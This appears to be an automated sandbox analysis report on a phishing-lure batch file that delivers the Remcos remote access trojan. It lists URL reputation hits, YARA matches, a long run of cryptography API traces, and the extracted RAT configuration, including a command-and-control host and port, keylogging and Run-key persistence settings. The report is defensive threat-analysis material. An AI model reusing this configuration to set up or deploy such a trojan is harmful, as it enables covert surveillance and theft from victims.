Windows Analysis Report
Purchase Order is approved26042024.cmd

AV Detection

Source: http://geoplugin.net/json.gp/C	URL Reputation: Label: phishing
Source: http://pesterbdd.com/images/Pester.png	URL Reputation: Label: malware
Source: http://geoplugin.net/json.gp	URL Reputation: Label: phishing

Source: 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Remcos {"Host:Port:Password": "^www.pentegrasystem.com:9231:0", "Assigned name": "NEWRemoteHost-APRILFILE", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-3A6IQD", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Source: Yara match	File source: 36.2.Kpeyvroh.PIF.21060000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.Kpeyvroh.PIF.21060000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001C.00000002.4502894836.0000000000805000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2461262597.000000007E9A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2419249499.000000000076D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.4524281071.000000001B7CF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2504569132.000000000067A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.3094133776.0000000000801000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.4503348467.0000000000810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.4503348467.0000000000823000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: sppsvc.pif PID: 5228, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Kpeyvroh.PIF PID: 7552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Kpeyvroh.PIF PID: 1528, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Cryptography

Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE42F38 ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,InitializeCriticalSection,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,LocalFree,lstrcmpW,#357,CoInitialize,#357,#357,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,		25_2_00007FF67DE42F38
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE42C2C CryptFindOIDInfo,memset,CryptRegisterOIDInfo,GetLastError,#357,		25_2_00007FF67DE42C2C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE87F14 CryptAcquireCertificatePrivateKey,GetLastError,#357,CryptSetProvParam,GetLastError,GetSecurityDescriptorLength,#359,CryptReleaseContext,		25_2_00007FF67DE87F14
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEC5F04 #357,#357,SysAllocStringByteLen,#357,SysFreeString,#357,#359,#357,lstrcmpW,CryptMsgControl,GetLastError,#357,CertFreeCertificateContext,#359,CertFreeCTLContext,LocalFree,SysFreeString,LocalFree,		25_2_00007FF67DEC5F04
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF07EE8 CryptFindOIDInfo,#357,CryptInitOIDFunctionSet,CryptGetOIDFunctionAddress,GetLastError,GetLastError,GetLastError,#357,strcmp,GetLastError,strcmp,GetLastError,CryptFindOIDInfo,CryptFindOIDInfo,#357,LocalFree,LocalFree,CryptFreeOIDFunctionAddress,LocalFree,LocalFree,		25_2_00007FF67DF07EE8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEBDEB0 wcscspn,#357,GetFileAttributesW,GetLastError,#359,CertEnumCertificatesInStore,CertGetCRLContextProperty,CryptBinaryToStringW,wcsstr,CertEnumCertificatesInStore,GetLastError,GetLastError,LocalFree,LocalFree,CertCloseStore,CertFreeCertificateContext,		25_2_00007FF67DEBDEB0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE8DEA4 memset,GetSystemTimeAsFileTime,CryptGenRandom,GetLastError,LocalAlloc,GetLastError,#357,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,		25_2_00007FF67DE8DEA4
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF35FF0 CryptDecodeObjectEx,CryptDecodeObjectEx,		25_2_00007FF67DF35FF0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEFDE70 NCryptIsKeyHandle,#357,CryptExportKey,GetLastError,#358,LocalAlloc,#357,CryptExportKey,GetLastError,LocalFree,		25_2_00007FF67DEFDE70
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEC1E2C CryptAcquireContextW,GetLastError,#357,CryptGenKey,GetLastError,CryptDestroyKey,#357,GetLastError,#357,#357,LocalAlloc,#357,memmove,LocalFree,memset,CryptGenRandom,GetLastError,#357,GetSystemTime,SystemTimeToFileTime,GetLastError,CertCreateCertificateContext,GetLastError,CryptReleaseContext,LocalFree,LocalFree,LocalFree,		25_2_00007FF67DEC1E2C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE65DF7 GetLastError,#357,#357,#358,#358,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCRLsInStore,CertEnumCRLsInStore,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,#357,		25_2_00007FF67DE65DF7
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE41DE8 GetSystemDefaultLangID,wcscspn,LocalFree,LocalFree,CryptEnumOIDInfo,qsort,free,		25_2_00007FF67DE41DE8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE65DA1 #358,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,		25_2_00007FF67DE65DA1
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE8DD80 CertFindExtension,CryptDecodeObject,		25_2_00007FF67DE8DD80
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEE5D80 #357,NCryptIsKeyHandle,GetSecurityDescriptorLength,CryptSetProvParam,GetLastError,LocalFree,#357,		25_2_00007FF67DEE5D80
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE91D70 #357,LocalAlloc,memmove,#357,CryptSetKeyParam,GetLastError,LocalAlloc,memmove,CryptDecrypt,GetLastError,#357,#357,#358,LocalFree,LocalFree,#357,#357,#357,LocalFree,LocalFree,LocalFree,		25_2_00007FF67DE91D70
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE89D6C #357,#357,#359,LocalAlloc,#357,#357,wcsrchr,LocalAlloc,memmove,CryptFindLocalizedName,wcsrchr,CryptFindLocalizedName,#357,GetLastError,#359,CertOpenStore,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,		25_2_00007FF67DE89D6C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEB3D60 #359,GetLastError,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,CryptReleaseContext,		25_2_00007FF67DEB3D60
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF07D3C #357,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,wcschr,CryptFindOIDInfo,#359,LocalFree,		25_2_00007FF67DF07D3C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF0BD3C NCryptIsKeyHandle,#357,#357,CryptSetProvParam,GetLastError,#357,CryptSetProvParam,GetLastError,LocalFree,		25_2_00007FF67DF0BD3C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF35D74 CryptDecodeObjectEx,strcmp,strcmp,		25_2_00007FF67DF35D74
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE660DA #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,		25_2_00007FF67DE660DA
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEA4070 _wcsnicmp,_wcsnicmp,_wcsnicmp,#357,GetLastError,#359,#357,LocalAlloc,memmove,wcsstr,#223,#357,#359,LocalFree,#359,LocalFree,LocalFree,LocalFree,LocalFree,CryptMemFree,		25_2_00007FF67DEA4070
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEFE044 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,LocalAlloc,#359,LocalFree,		25_2_00007FF67DEFE044
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF35E3C CryptDecodeObjectEx,strcmp,strcmp,strcmp,		25_2_00007FF67DF35E3C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE65FE8 #357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertFreeCTLContext,CertFreeCertificateContext,CertCloseStore,LocalFree,		25_2_00007FF67DE65FE8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED5FA8 NCryptIsKeyHandle,wcscmp,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,		25_2_00007FF67DED5FA8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED9F90 memmove,wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,		25_2_00007FF67DED9F90
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE6FF64 NCryptGetProperty,#359,NCryptGetProperty,CertEnumCertificatesInStore,CertFindCertificateInStore,CertFreeCertificateContext,CertEnumCertificatesInStore,CertFreeCertificateContext,CertCloseStore,CertCloseStore,#357,		25_2_00007FF67DE6FF64
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEA5F54 GetLastError,LocalAlloc,memmove,wcschr,CryptFindOIDInfo,#357,#357,LocalFree,LocalFree,		25_2_00007FF67DEA5F54
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF35F20 CryptDecodeObjectEx,		25_2_00007FF67DF35F20
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF0BB50 NCryptIsKeyHandle,#359,CertCreateCertificateContext,GetLastError,LocalFree,CryptGetKeyParam,GetLastError,#358,LocalAlloc,#357,CryptGetKeyParam,GetLastError,#357,		25_2_00007FF67DF0BB50
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE93B14 NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,CryptDestroyKey,		25_2_00007FF67DE93B14
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEC9AF8 CertCloseStore,CertCloseStore,CryptMsgClose,LocalFree,LocalFree,NCryptFreeObject,		25_2_00007FF67DEC9AF8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF35B90 CryptDecodeObjectEx,memmove,		25_2_00007FF67DF35B90
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEFFA84 LocalAlloc,#357,memmove,CryptDecrypt,GetLastError,#357,LocalFree,		25_2_00007FF67DEFFA84
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED7A70 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptSignHash,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,#357,_CxxThrowException,_CxxThrowException,NCryptSecretAgreement,#205,#357,#357,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,NCryptDeriveKey,#205,#359,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,		25_2_00007FF67DED7A70
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEE9A58 #357,#357,#210,#357,SetWindowTextW,SetFocus,SendMessageW,SendMessageW,LocalAlloc,#357,#357,LocalFree,UpdateWindow,CoInitialize,LoadCursorW,SetCursor,LoadCursorW,SetCursor,SetFocus,SetWindowTextW,SetFocus,#357,SetFocus,SendMessageW,#357,LocalFree,LocalFree,LocalFree,CryptUIDlgFreeCAContext,CoUninitialize,		25_2_00007FF67DEE9A58
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEEBA50 CryptSignCertificate,SetLastError,		25_2_00007FF67DEEBA50
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED1A44 CryptContextAddRef,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,		25_2_00007FF67DED1A44
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE63A40 LocalFree,LocalFree,strcmp,#357,strcmp,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,CryptDecodeObject,strcmp,LocalFree,strcmp,GetLastError,#357,LocalFree,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,#357,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,strcmp,strcmp,strcmp,#357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,LocalFree,strcmp,LocalFree,GetLastError,strcmp,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,		25_2_00007FF67DE63A40
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF35C54 CryptDecodeObjectEx,CryptDecodeObjectEx,		25_2_00007FF67DF35C54
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEBB9CC I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,I_CryptWalkAllLruCacheEntries,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,		25_2_00007FF67DEBB9CC
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE5F9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,		25_2_00007FF67DE5F9B8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE67988 CryptFindOIDInfo,#357,CryptFindOIDInfo,#357,GetLastError,#357,GetLastError,#357,LocalFree,		25_2_00007FF67DE67988
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEB597C GetLastError,CryptEncodeObjectEx,GetLastError,#357,		25_2_00007FF67DEB597C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEF9970 LocalAlloc,#357,LocalAlloc,CertGetEnhancedKeyUsage,GetLastError,#358,LocalFree,LocalFree,GetLastError,strcmp,#357,CryptFindOIDInfo,LocalFree,		25_2_00007FF67DEF9970
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEBB950 I_CryptGetLruEntryData,#357,		25_2_00007FF67DEBB950
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE8F944 CryptDecodeObject,GetLastError,#357,		25_2_00007FF67DE8F944
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEFFD2C CryptDecryptMessage,GetLastError,#357,		25_2_00007FF67DEFFD2C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEEDD1C #357,strcmp,GetLastError,CryptHashCertificate,GetLastError,LocalAlloc,memmove,LocalFree,		25_2_00007FF67DEEDD1C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF2B980 #357,CryptFindOIDInfo,#359,GetLastError,#357,#359,CryptGetProvParam,memset,CryptGetProvParam,CryptFindOIDInfo,#357,GetLastError,#357,CryptReleaseContext,BCryptFreeBuffer,		25_2_00007FF67DF2B980
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEC5CE8 #357,CertOpenStore,GetLastError,CertFindCertificateInStore,GetLastError,#359,LocalFree,CertFreeCertificateContext,CertCloseStore,CryptVerifyCertificateSignature,GetLastError,#357,		25_2_00007FF67DEC5CE8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEC1C84 GetLastError,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,#357,LocalFree,		25_2_00007FF67DEC1C84
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE83C60 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,CryptExportPublicKeyInfo,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertCreateCertificateContext,GetLastError,#357,#357,CertComparePublicKeyInfo,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalAlloc,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,CertSetCTLContextProperty,GetLastError,#357,#357,#358,#358,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,		25_2_00007FF67DE83C60
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF0BA14 NCryptIsKeyHandle,#357,CryptGetProvParam,GetLastError,NCryptFreeObject,		25_2_00007FF67DF0BA14
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE71C50 BCryptQueryProviderRegistration,#360,#357,BCryptFreeBuffer,		25_2_00007FF67DE71C50
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE8FC34 memset,#357,CryptDecodeObject,GetLastError,LocalAlloc,#357,memmove,memset,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,		25_2_00007FF67DE8FC34
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE6FC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,		25_2_00007FF67DE6FC20
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED3BEB _CxxThrowException,_CxxThrowException,_CxxThrowException,CryptExportKey,#205,GetLastError,#357,#357,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,		25_2_00007FF67DED3BEB
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE59BC8 #357,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,CryptDecodeObject,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,GetLastError,strcmp,CryptDecodeObject,GetLastError,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,strcmp,LocalFree,strcmp,SysFreeString,#357,#357,strcmp,SysFreeString,#357,SysFreeString,GetLastError,strcmp,LocalFree,LocalFree,CryptDecodeObject,strcmp,strcmp,strcmp,SysFreeString,LocalFree,		25_2_00007FF67DE59BC8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF35AA8 CryptDecodeObjectEx,		25_2_00007FF67DF35AA8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEDBBC0 wcscmp,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,CryptSignHashW,#205,GetLastError,#357,#359,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,		25_2_00007FF67DEDBBC0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE35BA4 #357,NCryptIsKeyHandle,strcmp,GetLastError,strcmp,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#359,LocalAlloc,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,LocalFree,SysFreeString,CertFreeCertificateContext,LocalFree,LocalFree,CryptReleaseContext,		25_2_00007FF67DE35BA4
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEFFB94 #357,CryptFindOIDInfo,LocalAlloc,CryptEncryptMessage,GetLastError,LocalFree,#357,		25_2_00007FF67DEFFB94
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE5BB80 #357,NCryptIsKeyHandle,#357,LocalFree,LocalFree,		25_2_00007FF67DE5BB80
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF07B60 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptFindOIDInfo,LocalAlloc,#357,memmove,CryptReleaseContext,		25_2_00007FF67DF07B60
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEDFB50 CryptExportPublicKeyInfo,GetLastError,#357,LocalAlloc,#357,CryptExportPublicKeyInfo,GetLastError,GetLastError,#357,#357,CertFindExtension,LocalAlloc,#357,memmove,#357,#357,#357,#357,#357,CAFindCertTypeByName,CAGetCertTypeExtensions,#357,#358,CertFindExtension,#357,LocalAlloc,memmove,memmove,#357,#357,GetLastError,#357,CertFindExtension,#357,GetLastError,#357,CryptSignAndEncodeCertificate,GetLastError,#357,LocalAlloc,CryptSignAndEncodeCertificate,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CAFreeCertTypeExtensions,CACloseCertType,		25_2_00007FF67DEDFB50
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DF05B44 CertFindExtension,#357,CryptDecodeObject,GetLastError,		25_2_00007FF67DF05B44
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE9BB38 #357,CryptVerifyCertificateSignatureEx,GetLastError,#357,memcmp,GetSystemTimeAsFileTime,CompareFileTime,CompareFileTime,CompareFileTime,#357,#358,LocalFree,LocalFree,LocalFree,LocalFree,		25_2_00007FF67DE9BB38
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED36E8 CryptSetHashParam,#205,GetLastError,#357,#357,#357,SetLastError,		25_2_00007FF67DED36E8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEBF6D8 #357,CryptDuplicateKey,GetLastError,CryptEncrypt,GetLastError,LocalAlloc,memmove,CryptEncrypt,GetLastError,LocalAlloc,CryptDestroyKey,LocalFree,		25_2_00007FF67DEBF6D8
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE876B0 #359,CryptAcquireCertificatePrivateKey,GetLastError,#357,#358,#359,#358,#358,LocalFree,LocalFree,#357,CryptFindCertificateKeyProvInfo,GetLastError,#357,LocalFree,LocalFree,CryptReleaseContext,		25_2_00007FF67DE876B0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEED6A0 CertOpenStore,GetLastError,#357,CryptMsgOpenToDecode,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,#357,LocalFree,LocalAlloc,#357,memmove,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgClose,CertCloseStore,LocalFree,LocalFree,		25_2_00007FF67DEED6A0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEF9688 CryptFindOIDInfo,#357,#360,#360,#360,		25_2_00007FF67DEF9688
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEA366C CryptVerifyCertificateSignature,GetLastError,CryptVerifyCertificateSignatureEx,GetLastError,#357,		25_2_00007FF67DEA366C
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEBB664 I_CryptFindLruEntry,I_CryptGetLruEntryData,I_CryptReleaseLruEntry,		25_2_00007FF67DEBB664
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE45664 #256,#357,CryptHashCertificate2,GetLastError,#254,#254,#357,#207,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,#359,		25_2_00007FF67DE45664
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE5D660 GetDesktopWindow,LocalFree,#357,CertDuplicateCertificateContext,GetLastError,#357,#357,#357,#357,#357,#207,LocalFree,#358,#357,#358,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,		25_2_00007FF67DE5D660
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DED3654 CryptReleaseContext,#205,GetLastError,#357,#357,SetLastError,		25_2_00007FF67DED3654
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEFF650 CryptHashCertificate2,SetLastError,		25_2_00007FF67DEFF650
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DECF644 NCryptDeleteKey,#205,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,		25_2_00007FF67DECF644
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE5F630 CryptAcquireContextW,GetLastError,#357,SetLastError,		25_2_00007FF67DE5F630
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DEB95FC BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,CertGetCRLContextProperty,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,BCryptCloseAlgorithmProvider,		25_2_00007FF67DEB95FC
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE955F0 #357,#360,GetLastError,#360,#359,NCryptDeleteKey,#360,#357,LocalFree,LocalFree,		25_2_00007FF67DE955F0
Source: C:\Users\Public\kn.exe	Code function: 25_2_00007FF67DE5D5C2 CertCloseStore,CryptMsgClose,LocalFree,LocalFree,LocalFree,LocalFree,		25_2_00007FF67DE5D5C2
